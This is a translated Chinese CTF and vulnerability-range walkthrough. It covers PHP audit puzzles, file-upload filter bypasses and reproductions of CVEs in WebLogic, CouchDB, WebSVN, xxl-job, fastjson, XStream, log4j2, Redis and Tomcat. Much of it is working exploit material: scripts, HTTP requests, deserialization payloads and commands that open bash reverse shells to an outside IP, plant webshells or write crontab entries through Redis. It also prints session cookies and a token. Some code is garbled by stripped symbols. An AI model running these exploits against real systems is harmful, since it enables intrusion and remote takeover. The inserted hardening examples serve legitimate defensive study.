Disclaimer: this article is for learning and research purposes only and does not encourage or support any illegal activity. All technical content is for personal skill improvement only and must not be used without authorization to attack, intrude on or damage other people's systems. We accept no responsibility for any legal liability or loss arising from use of this article.
Note: this article is a quick walkthrough; it is not complete, and for the details you still need to read the references.
Overall the challenges are fairly simple, mostly CVE reproductions. Thanks to A.M. for the great effort put into this article.
Contents
References
Practice challenges
1 PHP code audit
2 Path traversal
3 Log inclusion
4 MD5 loose comparison
5 MD5 strict comparison
6 Login form: password brute force
7 Login form: universal password
8 Login form: SQL injection
File upload scenarios
upload1: front-end JS
2: .htaccess bypass
3: MIME check (back end)
4: file-header MIME
5: file-name deletion
6: file-name replacement
7: %00 truncation
8: null-byte truncation
9: blacklist bypass
10: race condition
11: second rendering
12: /. suffix-check bypass
13: array bypass
VIP
2014-4210 (WebLogic weak password plus upload)
junams
drupal
yapi
2018-1273
CouchDB
WebSVN
Nostromo
xxl-job
jmeter
fastjson
xstream ???
log4j2 ????
Scenario ranges
Mirror site
CodeExec
API function
Redis
Redis, guess
PUT
XXE
Pretty hard!
WEB
52
redis-Lua
flink
weblogic
SpringFramework
L4
ZenTao CMS
cve-2019-9978
Tomcat cve-2020-13935 (repeated challenge)
References
360 Phone N6 Pro kernel vulnerability - Wiki
seacms: [Vulnerability reproduction: seaCms command execution] vulfocus/seacms-cnvd_2020_22721_cnvd-2020-22721 (CSDN blog)
Practice challenges
1 PHP code audit
MS08067 is calling you to find the Flag
your key:
<title>CheckMe-01</title>
<?php
print("<h1>MS08067喊你来找Flag了</h1>");
?>
<form action="index.php" method="POST">your key: <input type="text" name="key" /><input type="submit" value="Submit" />
</form>
<?php
if(!empty($_POST["key"])){
    $keys = $_POST["key"];
    show_source("index.php");
    $keys = base64_decode(urldecode($keys));
    if(strlen($keys) == 6){
        if($keys == "ctfctf"){
            print("<p>You win!</p>");
            include("flag.php");
            print($flag);
        }
    }else{
        print("末心大漏特漏此乃九年义务教育漏网之鱼。");
    }
}
?>
Answer: Y3RmY3Rm (base64 of ctfctf)
2 Path traversal
Welcome to CheckMe-02; come find your Flag and submit it.
flag{6de32f81-5388-4baa-a7a3-01f1d0d4ece0}
<?php include($_GET["url"]); ?>
3 Log inclusion
<?php include($_GET["text"]); ?>
Include the web server log to get a webshell, then run:
env
set
4 MD5 loose comparison
<?php
$flag;
$a = $_GET["a"];
$b = $_GET["b"];
if(isset($a) && isset($b)){
    if(!ctype_alpha($a)){ die("a error"); }
    if(!is_numeric($b)){ die("b error"); }
    if(md5($a) == md5($b)){ echo $flag; }
}else{
    echo "请问flag在哪里";
}
?>
MD5 loose comparison
Reference: 总结ctf中 MD5 绕过的一些思路 (CSDN blog, "ctf md5 bypass")
a must be alphabetic (ctype_alpha)
b must be numeric (is_numeric)
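Why the loose comparison above is bypassable and how to close it, as an added example in PHP (not code from the challenge); weak_check() and strict_check() are names introduced here, and the lead-in also explains why level 5 (===) needs a genuine collision pair instead:

```php
<?php
// Added example, not from the challenge: PHP's loose == applied to two MD5
// hex digests, beside the strict comparison that closes the hole.

// With ==, two strings that both parse as numbers are compared numerically.
// A hex digest of the form 0e<digits only> parses as 0 * 10^n = 0.0, so two
// different digests of that shape compare equal even though they share no
// bytes beyond the "0e" prefix.
function weak_check(string $a, string $b): bool {
    return md5($a) == md5($b);
}

// hash_equals() compares the digest strings byte for byte (and in constant
// time), so it accepts only identical digests; === would also do here.
function strict_check(string $a, string $b): bool {
    return hash_equals(md5($a), md5($b));
}

// A well-known pair that passes the challenge's filters: QNKCDZO is purely
// alphabetic (ctype_alpha) and 240610708 is numeric (is_numeric), and both
// MD5 digests have the 0e<digits> shape. weak_check() accepts the pair;
// strict_check() rejects it because the digests differ.
$a = 'QNKCDZO';
$b = '240610708';
var_dump(md5($a), md5($b));
var_dump(weak_check($a, $b));
var_dump(strict_check($a, $b));

// Numeric-string vs numeric-string comparison behaves this way in PHP 5, 7
// and 8; the PHP 8 change to == only affected number vs non-numeric-string
// cases. With === (the strict-type level that follows) the digests must match
// byte for byte, so only a real MD5 collision pair gets through.
```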
5 MD5 strict comparison
MD5 strict-type bypass
<?php
$a = $_GET["a"];
$b = $_GET["b"];
if($a !== $b && md5($a) === md5($b)){ echo($flag); }
?>
The two parameters are a known MD5 collision pair (they differ in two bytes but share the same digest):
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
6 Login form: password brute force
admin
Password: xxxxxxxxx, all digits
Just brute-force the password.
7 Login form: universal password
Universal password:
admin'#
Any password.
8 Login form: SQL injection
sqlmap, POST, time-based blind.
File upload scenarios
Source: Guoguang's file upload range
1-13
国光文件上传靶场 WriteUp | lololowe's blog
upload1: front-end JS
Passing the front-end JS check:
function checkfilesuffix()
{
    var file = document.getElementsByName("file")[0]["value"];
    if(file == "" || file == null){
        swal("请添加上传文件", "", "error");
        return false;
    }else{
        var whitelist = new Array(".jpg",".png",".gif",".jpeg");
        var file_suffix = file.substring(file.lastIndexOf("."));
        if(whitelist.indexOf(file_suffix) == -1){
            swal("只允许上传图片类型的文件!", "", "error");
            return false;
        }
    }
}
function error(){
    swal("上传失败", "", "error");
}
Disable JS and upload the PHP file, or upload a .jpg, intercept the request and change jpg to php; either passes the front-end check.
2 .htaccess bypass
The challenge uses a blacklist.
.htaccess is an Apache-specific configuration file, enabled by default, used to configure the Apache server; see https://xz.aliyun.com/t/8267?time__1311n4%2BxnD0Dc7exyDjxYqGNWP4IrVnuYA5GCzReD for details. The .htaccess directive we can use is AddHandler (SetHandler also works but is a little longer; see the article above). It binds a particular file format to a particular MIME type, for example binding .jpg to application/x-httpd-php, so that Apache treats .jpg files as PHP when it serves them. Upload this .htaccess:
# parse .phps .php3p .png .jpg .gif as PHP files
AddType application/x-httpd-php .phps .php3p .png .jpg .gif
Then upload shell.jpg (or any of the other suffixes) and it is parsed as PHP.
3 MIME check (back end)
image/jpeg
image/png
image/gif
image/jpg
Upload shell.php, intercept with Burp, change the MIME type from application/octet-stream to image/jpeg and the upload succeeds.
Alternatively upload shell.jpg with image/jpg and change the suffix to php.
4 File-header MIME
MIME types:
image/jpeg
image/jpg
image/png
image/gif
File headers and the formats they belong to:
89504E47 -- .png
FFD8FFE0 -- .jpg
47494638 -- .gif
copy pic.png/b + shell.php/a shell.png
Image trojan.
5 File-name deletion
shell.php --- shell.
shell.phphpp -- shell.php
6 File-name replacement
shell.pphphp --- shell.p hp
shell.PHP
7 %00 truncation
8 Null-byte truncation
%00, then URL-decode it
9 Blacklist bypass
shell.php5
10 Race condition
Payload:
?php fputs(fopen(shell.php,w),?php eval($_REQUEST[1]);?);??php fputs(fopen(xiao.php,w),?php eval($_REQUEST[1]);?);? # coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutordef td(list):url http://110.42.47.105:17373file {upload_file: (szm.php, ?php fputs(fopen(shell.php,w),?php eval($_POST[1]);?); ?)}data {submit: Upload}r requests.post(urlurl, datadata, filesfile)re requests.get(http://110.42.47.105:17373/upload/shell.php)if re.status_code 200:print(上传成功)if __name__ __main__:with ThreadPoolExecutor(20) as p:p.map(td, range(200000))
11 Second rendering
http://110.42.47.105:17953/?file=./upload/1946210678.gif (gif)
12 /. suffix-check bypass
13 Array bypass
copy 1.jpg/b + 2.php 3.jpg
This challenge is mainly code audit: MIME validation, a whitelist, and a caller-controlled upload path.
Source:
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    // check MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        // check the file name
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }
        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功";
                $is_upload = true;
            } else {
                $msg = "文件上传失败";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件";
}
For example, uploading upload.php.jpg produces the array
array(3){
    [0]=>"upload",
    [1]=>"php",
    [2]=>"jpg"
}
and the code only checks whether the last element of the array is in the whitelist.
So an array can be supplied directly (save_name is taken as-is when it is already an array) whose last element is a whitelisted suffix (jpg, png, gif).
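A hardened version of the handler above, added here as an example (it is not the lab's or the original post's code); UPLOAD_PATH, the message strings and the function names are assumptions:

```php
<?php
// Added example, not part of the lab's source: a hardened version of the
// handler above. The lab code fails because $_POST['save_name'] may be an
// array, the suffix check looks only at the array's last element, and the
// stored name is rebuilt from array elements. This version removes each of
// those footholds.

const UPLOAD_PATH  = __DIR__ . '/upload';            // assumed upload directory
const ALLOW_TYPE   = ['image/jpeg', 'image/png', 'image/gif'];
const ALLOW_SUFFIX = ['jpg' => 'jpg', 'jpeg' => 'jpg', 'png' => 'png', 'gif' => 'gif'];

// Map a requested file name to a whitelisted extension, or null to reject.
// Only scalar strings are accepted, so save_name[]=... never reaches the
// suffix logic. pathinfo() takes the text after the final dot of the base
// name: "upload.php.jpg" gives "jpg", "upload.php/." gives an empty
// extension, ".htaccess" gives "htaccess" and "shell.php5" gives "php5",
// and none of the last three is in the map.
function safe_extension($requested): ?string {
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    return ALLOW_SUFFIX[$ext] ?? null;
}

// Process one upload; returns a status message like the lab code does.
function handle_upload(array $files, array $post): string {
    if (empty($files['upload_file'])) {
        return 'Please choose a file to upload.';
    }
    $f = $files['upload_file'];
    // The Content-Type the client sent is only a first filter (section 3
    // shows it is trivially forged), so it must not be the last check.
    if (!in_array($f['type'], ALLOW_TYPE, true)) {
        return 'That file type is not allowed.';
    }
    $ext = safe_extension($post['save_name'] ?? $f['name']);
    if ($ext === null) {
        return 'That file suffix is not allowed.';
    }
    // Never reuse any client-supplied name on disk. A random name plus the
    // whitelisted extension cannot contain "php", "/." or a %00 byte, so the
    // truncation and double-suffix tricks from sections 5 to 9 have nothing
    // to act on.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_PATH . '/' . $stored;
    if (!is_uploaded_file($f['tmp_name']) || !move_uploaded_file($f['tmp_name'], $dest)) {
        return 'Upload failed.';
    }
    return 'Upload succeeded: ' . $stored;
}

// The lab's bypass input: save_name is an array whose last element is "jpg".
// safe_extension() rejects the array before any suffix check runs, while a
// plain "upload.php.jpg" is accepted only as a .jpg, never as .php, and an
// uploaded .htaccess (section 2) is refused by name.
var_dump(safe_extension(['upload.php/', 2 => 'jpg']));
var_dump(safe_extension('upload.php.jpg'));
var_dump(safe_extension('.htaccess'));
```

The stored file must still be served from a location with no PHP handler attached (the .htaccess section shows what happens otherwise), which is a web-server setting rather than something this code can enforce.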
VIP
2014-4210 (WebLogic weak password plus upload)
WebLogic SSRF reproduction (CVE-2014-4210); the flag is in an environment variable.
Reference: Weblogic SSRF漏洞(CVE-2014-4210)漏洞复现 (Bilibili)
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearchoperatorhttp://172.18.0.1:6379
weblogic
SSRF bot! I honestly did not know the internal IP.
Weak password to webshell: weak credentials weblogic / Oracle123
Rough upload flow: 渗透测试-Weblogic后台部署War大马 (CSDN blog)
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload
After a successful upload, visit /21/21.jsp and connect to the webshell.
junams
junams file upload CNVD-2020-24741 reproduction (CSDN blog)
drupal
Drupal remote code execution (CVE-2019-6339) simple reproduction - Mke2fs (cnblogs)
Drupal remote code execution (CVE-2019-6339): goby one-shot
yapi
YApi is a visual API management tool developed by Qunar's mobile architecture group (YMFE, a large front-end team made up of FE, iOS and Android engineers); it is a locally deployable API management platform that connects front end, back end and QA. A YApi instance exposed on the public internet with open registration lets an attacker register and then execute arbitrary commands.
Software API RCE: YApi Mock remote code execution vulnerability
2018-1273
goby one-shot
Description: Spring Expression Language is a powerful expression language that supports querying and manipulating an object graph at runtime. An attacker can, without authorization, inject crafted request parameters into a vulnerable server and achieve remote code execution.
CouchDB
Apache CouchDB is an open-source database focused on ease of use and on being a database that fully embraces the web. It is a NoSQL database that uses JSON as its storage format, JavaScript as its query language, MapReduce, and HTTP as its API. It is widely used: the BBC on its dynamic content platform, Credit Suisse in the market framework of its internal commodities department, Meebo on its social platform (web and apps).
EXP:
#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuthtarget http://your-ip:5984
command rbsh -i /dev/tcp/10.0.0.1/443 01
version 1session requests.session()
session.headers {Content-Type: application/json
}
# session.proxies {
# http: http://127.0.0.1:8085
# }
session.put(target /_users/org.couchdb.user:wooyun, data{type: user,name: wooyun,roles: [_admin],roles: [],password: wooyun
})session.auth HTTPBasicAuth(wooyun, wooyun)command bash -c {echo,%s}|{base64,-d}|{bash,-i} % base64.b64encode(command).decode()
if version 1:session.put(target (/_config/query_servers/cmd), datajson.dumps(command))
else:host session.get(target /_membership).json()[all_nodes][0]session.put(target /_node/{}/_config/query_servers/cmd.format(host), datajson.dumps(command))session.put(target /wooyun)
session.put(target /wooyun/test, data{_id: wooyuntest})if version 1:session.post(target /wooyun/_temp_view?limit10, data{language:cmd,map:})
else:session.put(target /wooyun/_design/test, data{_id:_design/test,views:{wooyun:{map:} },language:cmd})
WebSVN
WebSVN is an application, an online Subversion repository browser. WebSVN before 2.6.1 has a security flaw: the search parameter of search.php is filtered loosely, which leads to RCE.
EXP:
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305import requests
import argparse
from urllib.parse import quote_plusPAYLOAD /bin/bash -c bash -i /dev/tcp/127.0.0.1/9999 01
REQUEST_PAYLOAD /search.php?search;{};parser argparse.ArgumentParser(descriptionSend a payload to a websvn 2.6.0 server.)
parser.add_argument(target, typestr, helpTarget URL.)args parser.parse_args()if args.target.startswith(http://) or args.target.startswith(https://):target args.target
else:print([!] Target should start with either http:// or https://)exit()requests.get(target REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))print([*] Request send. Did you get what you wanted?)
Nostromo
Script: GitHub - jas502n/CVE-2019-16278: Directory transversal to remote code execution
./CVE-2019-16278.sh <ip> <port> id
xxl-job
xxl-job remote command execution reproduction (CSDN blog, xxljob漏洞)
POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Cookie: JSESSIONIDpqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace0|0; PHPSESSIDj49mvsid608froa0gcftn8euoe; login_autoYXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num0; eth0_time1737625442; eth0566.285; _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Content-Type: application/x-www-form-urlencoded{jobId: 1,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 1,logDateTime: 1586629003729,glueType: GLUE_SHELL,glueSource: echo bash -i /dev/tcp/39.105.154.133/9090 01 /tmp/1.sh,glueUpdatetime: 1586699003758,broadcastIndex: 0,broadcastTotal: 0
}POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Cookie: JSESSIONIDpqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace0|0; PHPSESSIDj49mvsid608froa0gcftn8euoe; login_autoYXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num0; eth0_time1737625442; eth0566.285; _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Content-Type: application/x-www-form-urlencoded{jobId: 1,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 1,logDateTime: 1586629003729,glueType: GLUE_SHELL,glueSource: chmod x /tmp/1.sh,glueUpdatetime: 1586699003758,broadcastIndex: 0,broadcastTotal: 0
}POST /run HTTP/1.1
Host: 27.25.151.24:21353
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Cookie: JSESSIONIDpqntnN1B82PhSh6nzsYJ78QM6crqSRgQQnY2yRf2k3bkl4CQc24x!1436664085; thinkphp_show_page_trace0|0; PHPSESSIDj49mvsid608froa0gcftn8euoe; login_autoYXs3g0Y%3D%7C5262229ded4a9fe53c184a493a611b345490077d; eth0_num0; eth0_time1737625442; eth0566.285; _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Content-Type: application/x-www-form-urlencoded{jobId: 1,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 1,logDateTime: 1586629003729,glueType: GLUE_SHELL,glueSource: /bin/bash /tmp/1.sh,glueUpdatetime: 1586699003758,broadcastIndex: 0,broadcastTotal: 0
}
Listen on the port and the shell comes in.
jmeter
JMeter RMI deserialization command execution
Tool:
GitHub - Y4er/ysoserial: a modified ysoserial that focuses on changing ysoserial.payloads.util.Gadgets.createTemplatesImpl so that commands, memory shells and deserialization echo can be run by bringing in a custom class.
https://github.com/Y4er/ysoserialjava -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 touch /tmp/success
Reverse shell:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 27.25.151.24 21492 BeanShell1 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy85MDkwIDAJjE}|{base64,-d}|{bash,-i}
fastjson
Fastjson reproduction - kar3a (cnblogs)
GitHub - mbechler/marshalsec
Create a malicious class that carries the reverse shell
javac ---- .class
Start an HTTP server, start an RMI listener on port 9999 with the tool, send the request and catch the shell.
curl http://27.25.151.24:28493/ -H Content-Type: application/json --data {name:karsa, age:22}
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;public class TouchFile {static {try {Runtime rt Runtime.getRuntime();String[] commands {/bin/bash, -c, bash -i /dev/tcp/39.105.154.133/6666 01};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://39.105.154.133:1337/#TouchFile 9999POC
POST / HTTP/1.1
Host: 27.25.151.24:26795
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160{b:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:rmi://39.105.154.133:9999/TouchFile,autoCommit:true}
}
xstream ???
CVE-2021-29505 XStream remote code execution reproduction; CVE-2021-21351: XStream deserialization remote code execution brief analysis
XStream deserialization reproduction - Arrest (cnblogs)
/bin/bash -i /dev/tcp/39.105.154.133/9090 01L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvOTA5MCAwPiYxjava -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 bash -c {echo,L2Jpbi9iYXNoIC1pPiYgL2Rldi90Y3AvMzkuMTA1LjE1NC4xMzMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}POST / HTTP/1.1
Host: 192.168.50.129:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1675
java.util.PriorityQueue serializationcustom unserializable-parents/ java.util.PriorityQueue default size2/size /default int3/int javax.naming.ldap.Rdn_-RdnEntry type12345/type value classcom.sun.org.apache.xpath.internal.objects.XString m__obj classstringcom.sun.xml.internal.ws.api.message.Packet2002fc1d Content/m__obj /value /javax.naming.ldap.Rdn_-RdnEntry javax.naming.ldap.Rdn_-RdnEntry type12345/type value classcom.sun.xml.internal.ws.api.message.Packet serializationcustom message classcom.sun.xml.internal.ws.message.saaj.SAAJMessage parsedMessagetrue/parsedMessage soapVersionSOAP_11/soapVersion bodyParts/ sm classcom.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl attachmentsInitializedfalse/attachmentsInitialized nullIter classcom.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator aliases classcom.sun.jndi.toolkit.dir.LazySearchEnumerationImpl candidates classcom.sun.jndi.rmi.registry.BindingEnumeration names stringaa/string stringaa/string /names ctx environment/ registry classsun.rmi.registry.RegistryImpl_Stub serializationcustom java.rmi.server.RemoteObject stringUnicastRef/string string39.105.154.133/string int4444/int long0/long int0/int long0/long short0/short booleanfalse/boolean /java.rmi.server.RemoteObject /registry host39.105.154.133/host port4444/port /ctx /candidates /aliases /nullIter /sm /message /value /javax.naming.ldap.Rdn_-RdnEntry /java.util.PriorityQueue /java.util.PriorityQueuePOST / HTTP/1.1
Host: 27.25.151.24:27172
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Cookie: _yapi_tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOjE0LCJpYXQiOjE3MzgwMjcxNjIsImV4cCI6MTczODYzMTk2Mn0.wPIYaltoPBnDTMYBWK_0cdLzFP_62xuWmeB78csh6GQ; _yapi_uid14
Cache-Control: max-age0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
Referer: http://attck.ms08067.com/
Content-Type: application/xmljava.util.PriorityQueue serializationcustomunserializable-parents/java.util.PriorityQueuedefaultsize2/size/defaultint3/intjavax.naming.ldap.Rdn_-RdnEntrytype12345/typevalue classcom.sun.org.apache.xpath.internal.objects.XStringm__obj classstringcom.sun.xml.internal.ws.api.message.Packet2002fc1d Content/m__obj/value/javax.naming.ldap.Rdn_-RdnEntryjavax.naming.ldap.Rdn_-RdnEntrytype12345/typevalue classcom.sun.xml.internal.ws.api.message.Packet serializationcustommessage classcom.sun.xml.internal.ws.message.saaj.SAAJMessageparsedMessagetrue/parsedMessagesoapVersionSOAP_11/soapVersionbodyParts/sm classcom.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1ImplattachmentsInitializedfalse/attachmentsInitializednullIter classcom.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIteratoraliases classcom.sun.jndi.toolkit.dir.LazySearchEnumerationImplcandidates classcom.sun.jndi.rmi.registry.BindingEnumerationnamesstringaa/stringstringaa/string/namesctxenvironment/registry classsun.rmi.registry.RegistryImpl_Stub serializationcustomjava.rmi.server.RemoteObjectstringUnicastRef/stringstring39.105.154.133/stringint6666/intlong0/longint0/intlong0/longshort0/shortbooleanfalse/boolean/java.rmi.server.RemoteObject/registryhost39.105.154.133/hostport6666/port/ctx/candidates/aliases/nullIter/sm/message/value/javax.naming.ldap.Rdn_-RdnEntry/java.util.PriorityQueue
/java.util.PriorityQueue
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -i /dev/tcp/39.105.154.133/9090 01 21 -A 39.105.154.133bash -i /dev/tcp/39.105.154.133/8888 01 21rmi://39.105.154.133:1099/jskfvrjava 1.8 8 11 17
log4j2 ????
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 想要执行的命令 -A 攻击机 的ipjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjI0OS4xMjgvNzc3NyAwPiYx} |{base64,-d} | {bash,-i} -A 攻击机ipjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8zOS4xMDUuMTU0LjEzMy8xMDAwMSAwPiYx} |{base64,-d} | {bash,-i} -A 39.105.154.133${jdni:rmi://39.105.154.133:1099/vacwrg}
Use the JNDI-Injection-Exploit.jar tool to generate the reverse shell (reverse statement: bash -i /dev/tcp/xx..xx.88/10001 01)
Scenario ranges
Mirror site
SSRF
CTFHub Web: Web practice: SSRF (in progress) - AcWing
Read it with the file:// protocol.
CodeExec
Directory scan
Found: [12:08:43] 200 - 199B - /shell.php
Visit it and execute commands through the GET parameter cmd:
?cmd=set
API function
ping
Redis
Unauthorized access
// set the key
set xxx \n\n* * * * * bash -i /dev/tcp/39.105.154.133/9090 01\n\n
// add a key named xxx whose value is the reverse-shell line that follows; the five asterisks mean run every minute, and the \n are line breaks so the crontab syntax stays valid. You can also try it without the \n and look at the garbage it produces; stepping on that pit once makes it stick
// set the directory
config set dir /var/spool/cron/
// set the file name
config set dbfilename root
// save the key into the root file
save
Then just wait for it to succeed.
flag{7b992efb5ab23a3a3d5100e366c48423}
http://101.43.64.97:36291/
redis-cli -h 101.43.64.97 -p 36291
// set the key
set xxx \n\n* * * * * bash -i /dev/tcp/39.105.154.133/2333 01\n\n
// add a key named xxx whose value is the reverse-shell line that follows; the five asterisks mean run every minute, and the \n are line breaks so the crontab syntax stays valid
// set the directory
config set dir /var/spool/cron/
// set the file name
config set dbfilename root
// save the key into the root file
save
Then just wait for it to succeed.
Redis, guess
File inclusion
/etc/redis.conf
PUT
Tomcat arbitrary file write (CVE-2017-12615)
Capture the home-page request and change the request method:
PUT /1.jsp/ HTTP/1.1
Host: 101.43.64.97:37944
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
Webshell. RCE:
